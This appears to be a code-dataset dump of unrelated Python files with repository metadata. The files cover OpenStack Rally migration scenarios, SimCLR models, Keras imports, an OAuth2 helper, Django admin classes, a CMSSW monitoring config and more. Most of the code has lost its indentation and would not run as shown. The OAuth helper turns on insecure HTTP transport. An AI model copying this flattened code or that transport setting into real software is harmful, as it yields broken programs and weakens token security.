:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume_and_live_migrate(self, image, flavor,
volume_size,
block_migration=False,
disk_over_commit=False,
force_delete=False,
min_sleep=0, max_sleep=0,
**kwargs):
"""Boot a server from volume and then migrate it.
The scenario first creates a volume and a server booted from
the volume on a compute node available in the availability zone and
then migrates the VM to another compute node on the same availability
zone.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between VM booting and running live migration
(of random duration from range [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param force_delete: True if force_delete should be used
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
server = self._boot_server(image, flavor,
block_device_mapping=block_device_mapping,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["cinder", "nova"]})
def boot_server_attach_created_volume_and_live_migrate(
self,
image,
flavor,
size,
block_migration=False,
disk_over_commit=False,
boot_server_kwargs=None,
create_volume_kwargs=None,
min_sleep=0,
max_sleep=0):
"""Create a VM, attach a volume to it and live migrate.
Simple test to create a VM and attach a volume, then migrate the VM,
detach the volume and delete volume/VM.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between attaching a volume and running live
migration (of random duration from range [min_sleep, max_sleep]).
:param image: Glance image name to use for the VM
:param flavor: VM flavor name
:param size: volume size (in GB)
:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param boot_server_kwargs: optional arguments for VM creation
:param create_volume_kwargs: optional arguments for volume creation
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
"""
if boot_server_kwargs is None:
boot_server_kwargs = {}
if create_volume_kwargs is None:
create_volume_kwargs = {}
server = self._boot_server(image, flavor, **boot_server_kwargs)
volume = self._create_volume(size, **create_volume_kwargs)
self._attach_volume(server, volume)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._detach_volume(server, volume)
self._delete_volume(volume)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_migrate_server(self, image, flavor, **kwargs):
"""Migrate a server.
This scenario launches a VM on a compute node available in
the availability zone and stops the VM, and then migrates the VM
to another compute node on the same availability zone.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._stop_server(server)
self._migrate(server)
# NOTE(wtakase): This is required because cold migration and resize
# share same code path.
confirm = kwargs.get("confirm", True)
if confirm:
self._resize_confirm(server, status="SHUTOFF")
else:
self._resize_revert(server, status="SHUTOFF")
self._delete_server(server)
@types.set(from_image=types.ImageResourceType,
to_image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "from_image")
@validation.image_valid_on_flavor("flavor", "to_image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_rebuild_server(self, from_image, to_image, flavor, **kwargs):
"""Rebuild a server.
This scenario launches a VM, then rebuilds that VM with a
different image.
:param from_image: image to be used to boot an instance
:param to_image: image to be used to rebuild the instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(from_image, flavor, **kwargs)
self._rebuild_server(server, to_image)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@validation.required_contexts("network")
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_associate_floating_ip(self, image, flavor, **kwargs):
"""Boot a server and associate a floating IP to it.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
address = network_wrapper.wrap(
self.clients, self.context["task"]).create_floating_ip(
tenant_id=server.tenant_id)
self._associate_floating_ip(server, address["ip"])
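These scenario methods are normally driven from a Rally task file rather than called directly. As a rough illustration only (the exact task schema depends on the Rally version, and the image/flavor names are placeholders), a task entry for boot_and_delete_server could look like the following Python dict before being serialized to JSON or YAML:

task = {
    "NovaServers.boot_and_delete_server": [{
        "args": {"image": {"name": "cirros"}, "flavor": {"name": "m1.tiny"},
                 "min_sleep": 1, "max_sleep": 5},
        "runner": {"type": "constant", "times": 10, "concurrency": 2},
        "context": {"users": {"tenants": 2, "users_per_tenant": 2}},
    }]
}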
| 46.462963
| 79
| 0.657201
|
ee7f8fa38ef4a09b9dd4c0a265a336c843e81aae
| 3,322
|
py
|
Python
|
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | 2
|
2022-03-30T07:24:07.000Z
|
2022-03-30T07:53:44.000Z
|
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | null | null | null |
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.model_utils import SymReLU
from models.nt_xent import NT_Xent
class SimCLROrigModel(nn.Module):
def __init__(self, Wo_init, m, p, d,
has_online_ReLU=True,
has_target_ReLU=True,
device=None,
batch_size=64,
temperature=0.05
) -> None:
super().__init__()
self.p=p
self.m=m
self.d=d
self.Wo = nn.Linear(p, m, bias=True)
self.Wp = nn.Linear(m, m, bias=True)
self.srelu = SymReLU()
self.has_online_ReLU = has_online_ReLU
self.has_target_ReLU = has_target_ReLU
self.init_weights(Wo_init)
self.criterion = NT_Xent(batch_size, temperature)
self.batch_size = batch_size
self.temperature = temperature
self.device = device
self.bn1 = nn.BatchNorm1d(m)
self.name = "simclr-orig"
def init_weights(self, Wo_init):
if self.Wo.weight.shape == Wo_init.T.shape:
Wo_init = Wo_init.T
assert Wo_init.shape == self.Wo.weight.shape
with torch.no_grad():
self.Wo.weight.data = torch.from_numpy(Wo_init).type(torch.float)
def forward(self, x1, x2):
zo, zt = self.Wo(x1), self.Wo(x2)
zo = self.srelu(self.bn1(zo), self.Wo.bias)
zt = self.srelu(self.bn1(zt), self.Wo.bias)
self.predicted_rep = zo
self.target_rep = zt
zo = self.Wp(zo)
zt = self.Wp(zt)
loss = self.criterion(zo, zt)
return loss
class SimCLRModel(nn.Module):
def __init__(self, Wo_init, m, p, d,
has_online_ReLU=True,
has_target_ReLU=True,
device=None,
batch_size=64,
temperature=0.05,
use_bn=False,
) -> None:
super().__init__()
self.p=p
self.m=m
self.d=d
self.Wo = nn.Linear(p, m, bias=True)
self.srelu = SymReLU()
self.has_online_ReLU = has_online_ReLU
self.has_target_ReLU = has_target_ReLU
self.use_bn = use_bn
self.bn1 = nn.BatchNorm1d(m)
self.init_weights(Wo_init)
self.criterion = NT_Xent(batch_size, temperature)
self.batch_size = batch_size
self.temperature = temperature
self.device = device
self.name = "simclr"
def init_weights(self, Wo_init):
if self.Wo.weight.shape == Wo_init.T.shape:
Wo_init = Wo_init.T
assert Wo_init.shape == self.Wo.weight.shape
with torch.no_grad():
self.Wo.weight.data = torch.from_numpy(Wo_init).type(torch.float)
def forward(self, x1, x2):
zo, zt = self.Wo(x1), self.Wo(x2)
if self.use_bn:
zo = self.bn1(zo)
zt = self.bn1(zt)
if self.has_online_ReLU and self.has_target_ReLU:
zo = self.srelu(zo, self.Wo.bias)
zt = self.srelu(zt, self.Wo.bias)
self.predicted_rep = zo
self.target_rep = zt
loss = self.criterion(zo, zt)
return loss
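A hedged usage sketch, not part of the file above: it assumes the repository's models package is importable and that Wo_init is a numpy array whose shape matches nn.Linear(p, m).weight, as init_weights expects.

import numpy as np
import torch
from models.simclr import SimCLRModel   # assumes this repo's `models` package is on the path

p, m, d, batch = 8, 16, 4, 64
Wo_init = np.random.randn(m, p).astype(np.float32)      # same shape as Wo.weight
model = SimCLRModel(Wo_init, m=m, p=p, d=d, batch_size=batch)

x1, x2 = torch.randn(batch, p), torch.randn(batch, p)   # two augmented views of one batch
loss = model(x1, x2)                                    # forward() returns the NT-Xent loss
loss.backward()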
| 26.365079
| 77
| 0.54696
|
77123ef413546198598407553cd2c9fd43c6868f
| 2,515
|
py
|
Python
|
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | null | null | null |
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | null | null | null |
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/python/keras/api/_v2/keras/applications/__init__.py
|
Lube-Project/ProgettoLube
|
cbf33971e2c2e865783ec1a2302625539186a338
|
[
"MIT"
] | 1
|
2021-01-28T01:57:41.000Z
|
2021-01-28T01:57:41.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Keras Applications are canned architectures with pre-trained weights.
"""
from __future__ import print_function as _print_function
import sys as _sys
from . import densenet
from . import efficientnet
from . import imagenet_utils
from . import inception_resnet_v2
from . import inception_v3
from . import mobilenet
from . import mobilenet_v2
from . import nasnet
from . import resnet
from . import resnet50
from . import resnet_v2
from . import vgg16
from . import vgg19
from . import xception
from tensorflow.python.keras.applications.densenet import DenseNet121
from tensorflow.python.keras.applications.densenet import DenseNet169
from tensorflow.python.keras.applications.densenet import DenseNet201
from tensorflow.python.keras.applications.efficientnet import EfficientNetB0
from tensorflow.python.keras.applications.efficientnet import EfficientNetB1
from tensorflow.python.keras.applications.efficientnet import EfficientNetB2
from tensorflow.python.keras.applications.efficientnet import EfficientNetB3
from tensorflow.python.keras.applications.efficientnet import EfficientNetB4
from tensorflow.python.keras.applications.efficientnet import EfficientNetB5
from tensorflow.python.keras.applications.efficientnet import EfficientNetB6
from tensorflow.python.keras.applications.efficientnet import EfficientNetB7
from tensorflow.python.keras.applications.inception_resnet_v2 import InceptionResNetV2
from tensorflow.python.keras.applications.inception_v3 import InceptionV3
from tensorflow.python.keras.applications.mobilenet import MobileNet
from tensorflow.python.keras.applications.mobilenet_v2 import MobileNetV2
from tensorflow.python.keras.applications.nasnet import NASNetLarge
from tensorflow.python.keras.applications.nasnet import NASNetMobile
from tensorflow.python.keras.applications.resnet import ResNet101
from tensorflow.python.keras.applications.resnet import ResNet152
from tensorflow.python.keras.applications.resnet import ResNet50
from tensorflow.python.keras.applications.resnet_v2 import ResNet101V2
from tensorflow.python.keras.applications.resnet_v2 import ResNet152V2
from tensorflow.python.keras.applications.resnet_v2 import ResNet50V2
from tensorflow.python.keras.applications.vgg16 import VGG16
from tensorflow.python.keras.applications.vgg19 import VGG19
from tensorflow.python.keras.applications.xception import Xception
del _print_function
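As a hedged usage sketch (not part of the generated file): any of the re-exported architectures can be instantiated with pretrained ImageNet weights, e.g. MobileNetV2, assuming TensorFlow 2.x is installed and network access is available for the weight download.

import numpy as np
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras.applications.mobilenet_v2 import decode_predictions, preprocess_input

model = MobileNetV2(weights="imagenet")                          # 224x224 RGB classifier
x = preprocess_input(np.random.rand(1, 224, 224, 3) * 255.0)     # dummy image batch
preds = model.predict(x)
print(decode_predictions(preds, top=3)[0])                       # top-3 (id, name, score) tuples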
| 48.365385
| 86
| 0.866004
|
0c875de19b1e7f9622e083159d801425d1fb2aa1
| 572
|
py
|
Python
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 28
|
2019-01-07T04:07:55.000Z
|
2021-11-09T15:16:11.000Z
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 9
|
2019-12-25T08:00:33.000Z
|
2021-11-23T09:02:34.000Z
|
neuralnet_pytorch/optim/lr_scheduler/inverse_lr.py
|
justanhduc/neuralnet-pytorch
|
cbb0c5a540a0ba91cb4dd20684bb00692305d193
|
[
"MIT"
] | 3
|
2020-08-07T12:49:05.000Z
|
2022-03-07T21:32:39.000Z
|
import torch.optim as optim
class InverseLR(optim.lr_scheduler.LambdaLR):
"""Decreases lr every iteration by the inverse of gamma times iteration plus 1.
:math:`\\text{lr} = \\text{lr} / (1 + \\gamma * t)`.
Parameters
----------
optimizer
wrapped optimizer.
gamma
decrease coefficient.
last_epoch : int
the index of last epoch. Default: -1.
"""
def __init__(self, optimizer, gamma, last_epoch=-1):
self.gamma = gamma
super().__init__(optimizer, lambda it: 1. / (1. + gamma * it), last_epoch)
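A small usage sketch, not in the file above, assuming the import path matches the repository layout:

import torch
from torch import optim
from neuralnet_pytorch.optim.lr_scheduler.inverse_lr import InverseLR  # assumed import path

w = torch.nn.Parameter(torch.zeros(3))
opt = optim.SGD([w], lr=0.1)
sched = InverseLR(opt, gamma=0.5)

for it in range(4):
    opt.step()
    sched.step()
    print(opt.param_groups[0]["lr"])   # 0.1 / (1 + 0.5 * t), t incrementing each step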
| 27.238095
| 83
| 0.611888
|
640aff09c0fd42aa079023c004699bf1f88756c3
| 468
|
py
|
Python
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | 1
|
2020-12-31T16:38:04.000Z
|
2020-12-31T16:38:04.000Z
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | 15
|
2021-01-24T16:27:10.000Z
|
2021-02-17T19:43:08.000Z
|
scripts/run-web-server.py
|
tmadden/alia-html
|
6a1feb615028ca08de72c9e889c43d6ceb8b9cfd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import BaseHTTPServer, SimpleHTTPServer
port = 8002
print "Running on port %d" % port
SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map[
'.wasm'] = 'application/wasm'
httpd = BaseHTTPServer.HTTPServer(('localhost', port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
print "Mapping \".wasm\" to \"%s\"" % \
SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map['.wasm']
httpd.serve_forever()
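The script above targets Python 2 (print statements, BaseHTTPServer/SimpleHTTPServer). For reference only, and not part of the original file, a rough Python 3 equivalent using the merged http.server module:

from http.server import HTTPServer, SimpleHTTPRequestHandler

port = 8002
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
print("Running on port %d" % port)
print('Mapping ".wasm" to "%s"' % SimpleHTTPRequestHandler.extensions_map['.wasm'])
httpd = HTTPServer(('localhost', port), SimpleHTTPRequestHandler)
httpd.serve_forever()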
| 29.25
| 76
| 0.709402
|
4e0c1aff997716b94e6987b75f26e8944b0904da
| 3,553
|
py
|
Python
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/ttam-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 1
|
2020-06-27T20:00:41.000Z
|
2020-06-27T20:00:41.000Z
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/api-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 35
|
2019-02-11T19:52:38.000Z
|
2021-03-02T21:46:28.000Z
|
api_buddy/network/auth/oauth2.py
|
fonsecapeter/ttam-buddy
|
4cff7a6f61825d71ec8ebdfd324631043a0ba8c8
|
[
"MIT"
] | 1
|
2020-06-27T20:00:47.000Z
|
2020-06-27T20:00:47.000Z
|
import webbrowser
from colorama import Fore, Style
from os import environ
from typing import Optional
from time import sleep
from urllib.parse import urljoin
from requests_oauthlib import OAuth2Session
from api_buddy.utils.exceptions import print_exception
from api_buddy.utils.typing import Options, Preferences, QueryParams
from api_buddy.config.preferences import save_prefs
APPLICATION_JSON = 'application/json'
DRAMATIC_PAUSE = 3 # seconds
HEADERS = {
'Accept': APPLICATION_JSON,
'Content-Type': APPLICATION_JSON,
}
def _get_authorization_response_url() -> str:
return input( # pragma: no cover
f'{Fore.GREEN}Enter the full url{Fore.BLACK}{Style.BRIGHT}:'
f'{Style.RESET_ALL} '
)
def _authenticate(
sesh: OAuth2Session,
client_secret: str,
api_url: str,
redirect_uri: str,
state: Optional[str],
token_path: str,
authorize_path: str,
authorize_params: QueryParams,
) -> str:
"""Perform OAuth2 Flow and get a new token
Note:
Implicitly updates the OAuth2Session
"""
authorization_url, state = sesh.authorization_url(
urljoin(api_url, authorize_path),
state=state,
kwargs=authorize_params,
)
print(
'Opening browser to visit:\n\n'
f'{Fore.BLUE}{Style.BRIGHT}{authorization_url}{Style.RESET_ALL}\n\n'
'Sign in and go through the DSA, then copy the url at the end.\n'
)
sleep(DRAMATIC_PAUSE)
try:
webbrowser.open(authorization_url)
except NotADirectoryError: # If permissions error
print_exception(
title='I couldn\'t open your browser',
message=(
'Go ahead and copy/paste the url into your browser\n'
'Then sign in and go through the DSA.'
),
)
sleep(DRAMATIC_PAUSE)
authorization_response = _get_authorization_response_url()
print()
environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1' # allow non-http redirect_uri
token = sesh.fetch_token(
urljoin(api_url, token_path),
authorization_response=authorization_response,
client_secret=client_secret,
include_client_id=True,
)
return str(token['access_token'])
def get_oauth2_session(
opts: Options,
prefs: Preferences,
prefs_file_name: str,
) -> OAuth2Session:
"""Initialize OAuth2 session"""
sesh = OAuth2Session(
client_id=prefs['oauth2']['client_id'],
redirect_uri=prefs['oauth2']['redirect_uri'],
scope=' '.join(prefs['oauth2']['scopes']),
token={'access_token': prefs['oauth2']['access_token']},
)
sesh.headers.update(HEADERS)
return sesh
def reauthenticate_oauth2(
sesh: OAuth2Session,
prefs: Preferences,
prefs_file: str,
) -> OAuth2Session:
"""Get a new oauth token for an existing session
Also save it to preferences
"""
oauth2_prefs = prefs['oauth2']
access_token = _authenticate(
sesh,
client_secret=prefs['oauth2']['client_secret'],
api_url=prefs['api_url'],
redirect_uri=oauth2_prefs['redirect_uri'],
state=oauth2_prefs['state'],
token_path=oauth2_prefs['token_path'],
authorize_path=oauth2_prefs['authorize_path'],
authorize_params=oauth2_prefs['authorize_params'],
)
prefs['oauth2']['access_token'] = access_token
save_prefs(prefs, prefs_file)
return sesh
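# A minimal usage sketch (not part of the original module), assuming a
# preferences dict shaped like the lookups above (prefs['api_url'] and
# prefs['oauth2'][...]). Every concrete value below is a placeholder.
if __name__ == "__main__":
    example_prefs = {
        'api_url': 'https://api.example.com',
        'oauth2': {
            'client_id': 'example-client-id',
            'client_secret': 'example-client-secret',
            'redirect_uri': 'http://localhost:8080/',
            'scopes': ['read'],
            'access_token': '',
            'state': None,
            'token_path': '/oauth2/token',
            'authorize_path': '/oauth2/authorize',
            'authorize_params': {},
        },
    }
    sesh = get_oauth2_session({}, example_prefs, 'preferences.yml')
    # Re-running the flow fetches a fresh token and saves it back to preferences.
    sesh = reauthenticate_oauth2(sesh, example_prefs, 'preferences.yml')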
| 30.62931
| 79
| 0.646214
|
ec4375f12e02142c68423b6c1ec7f68c03e47dd2
| 550
|
py
|
Python
|
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | null | null | null |
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | 2
|
2020-06-05T21:39:21.000Z
|
2021-06-10T21:40:18.000Z
|
material/admin.py
|
prabinrs/surveilance-system
|
1a9f118737d1043133dbb7247573b4616a680c2d
|
[
"BSD-3-Clause"
] | 1
|
2020-02-26T15:06:32.000Z
|
2020-02-26T15:06:32.000Z
|
from django.contrib import admin
from .models import (
Material, MaterialRelationship,
MaterialLocationParticipation, MaterialResponsibility
)
@admin.register(Material)
class MaterialAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialRelationship)
class MaterialRelationshipAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialLocationParticipation)
class MaterialLocationParticipationAdmin(admin.ModelAdmin):
pass
@admin.register(MaterialResponsibility)
class MaterialResponsibilityAdmin(admin.ModelAdmin):
pass
| 20.37037
| 59
| 0.816364
|
a737f124742ab7bc9235b2b0ac0af298462cccb7
| 1,482
|
py
|
Python
|
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
clever_config/actions.py
|
osipov-andrey/python_smart_config
|
2de65d2bef54aadb5cdba1498215a93e71018b28
|
[
"MIT"
] | null | null | null |
import abc
from os import getenv
from typing import List, Optional, Union
class ActionException(Exception):
pass
class BaseAction(abc.ABC):
def conditionally_transform(self, path_chain: List[Union[str, int]], value: str) -> str:
if self.is_needed(path_chain, value):
return self.transform(path_chain, value)
return value
@staticmethod
def path_to_str(path_chain: List[Union[str, int]]) -> str:
return " -> ".join(str(el) for el in path_chain)
@abc.abstractmethod
def is_needed(self, path_chain: List[Union[str, int]], value: str) -> bool:
pass
@abc.abstractmethod
def transform(self, path_chain: List[Union[str, int]], value: str) -> str:
pass
def __pre_traversal_hook__(self, mapping: dict) -> None:
pass
def __post_traversal_hook__(self, mapping: dict) -> None:
pass
class EnvLoaderAction(BaseAction):
ENV_PLACEHOLDER_PREFIX = "ENV__"
def is_needed(self, path_chain: List[Union[str, int]], value: str) -> bool:
return value.startswith(self.ENV_PLACEHOLDER_PREFIX)
def transform(self, path_chain: List[Union[str, int]], value: str) -> str:
expected_var_name: str = value.replace(self.ENV_PLACEHOLDER_PREFIX, "")
value_: Optional[str] = getenv(expected_var_name)
if not value_:
raise ActionException(f"Broken ENV Variable: {expected_var_name}! Path: {self.path_to_str(path_chain)}")
return value_
| 31.531915
| 116
| 0.674089
|
58dd6b41943e1236cdd4d34fb1ba3769596a4861
| 385
|
py
|
Python
|
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
data/check_movielens_data.py
|
sourav22899/k-sets-problem
|
9584c59c32a3d7ba4044a7aa41eba321dab5da48
|
[
"MIT"
] | null | null | null |
import pandas as pd
raw_data = pd.read_csv("./ml-latest-small/ratings.csv")
data = pd.DataFrame({
"request": raw_data["movieId"],
"timestamp": raw_data["timestamp"]
})
data['request'] = pd.factorize(data["request"].tolist(), sort=True)[0]
data = data.sort_values(by=["timestamp"])
data = data.drop_duplicates()
data.info()
data.to_csv('./movielens_cleaned.csv', index=False)
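# Optional sanity check (not in the original script): read the cleaned file
# back and inspect the range of the factorized request ids and the final shape.
check = pd.read_csv('./movielens_cleaned.csv')
print(check['request'].min(), check['request'].max(), check.shape)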
| 27.5
| 70
| 0.698701
|
5589ed1bb1728d5fcc0d5ba8fc70fd5162a7567c
| 5,777
|
py
|
Python
|
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
DQM/SiStripMonitorHardware/python/test/testSiStripCMMonitor_cfg.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
import FWCore.ParameterSet.Config as cms
process = cms.Process('DQMCMMonitor')
process.load('Configuration/StandardSequences/Services_cff')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.MessageLogger.cerr.FwkReport.reportEvery = 100
process.source = cms.Source(
"PoolSource",
fileNames = cms.untracked.vstring(
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69750_FEED31F3-58AC-DD11-BF73-000423D99658.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69800_026DBE87-A5AC-DD11-9397-0030487C608C.root'
#'file:/home/magnan/SOFTWARE/CMS/CMSSW_3_1_0_pre11/src/FedWorkDir/FedMonitoring/test/Digi_run69800.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69797_FC26431D-91AC-DD11-A0D1-001617E30CC8.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning08/Run69874_98BB9120-E6AC-DD11-9B91-000423D99896.root'
'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning09/Run106019_00D9F347-4D72-DE11-93F6-001D09F24399.root'
#'file:/home/magnan/SOFTWARE/CMS/data/FED/Commissioning09/Run101045_A6F7D0D3-4560-DE11-A52A-001D09F2545B.root'
),
skipBadFiles = cms.untracked.bool(True),
#inputCommands = cms.untracked.vstring('drop *', 'keep *_source_*_*'),
)
#process.load("DQM.SiStripMonitorHardware.test.source_cff")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
#process.service = cms.ProfilerService {
# untracked int32 firstEvent = 1
# untracked int32 lastEvent = 50
# untracked vstring paths = { "p"}
# }
#process.load('DQM.SiStripCommon.MessageLogger_cfi')
process.load('FWCore/MessageService/MessageLogger_cfi')
process.MessageLogger = cms.Service(
"MessageLogger",
info = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
suppressInfo = cms.untracked.vstring(),
# allows to suppress output from specific modules
suppressDebug = cms.untracked.vstring(),
debug = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
warning = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
cerr = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
error = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR'),
#limit = cms.untracked.int32(100000),
noLineBreaks = cms.untracked.bool(False)
),
suppressWarning = cms.untracked.vstring(),
#debugModules = cms.untracked.vstring('*'),#'siStripFEDMonitor'),
destinations = cms.untracked.vstring('cerr',
'debug',
'info',
'warning',
'error')
)
process.DQMStore = cms.Service("DQMStore")
#needed to produce tkHistoMap
process.TkDetMap = cms.Service("TkDetMap")
process.SiStripDetInfoFileReader = cms.Service("SiStripDetInfoFileReader")
# Conditions (Global Tag is used here):
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.connect = "frontier://FrontierProd/CMS_COND_21X_GLOBALTAG"
process.GlobalTag.globaltag = "GR09_31X_V1P::All"
process.es_prefer_GlobalTag = cms.ESPrefer('PoolDBESSource','GlobalTag')
process.load("CondCore.DBCommon.CondDBSetup_cfi")
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
# Real data raw to digi
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")
process.load("DPGAnalysis.SiStripTools.apvshotsanalyzer_cfi")
process.load('DQM.SiStripMonitorHardware.siStripCMMonitor_cfi')
process.siStripCMMonitor.FillWithEventNumber = False
process.siStripCMMonitor.FillWithLocalEventNumber = False
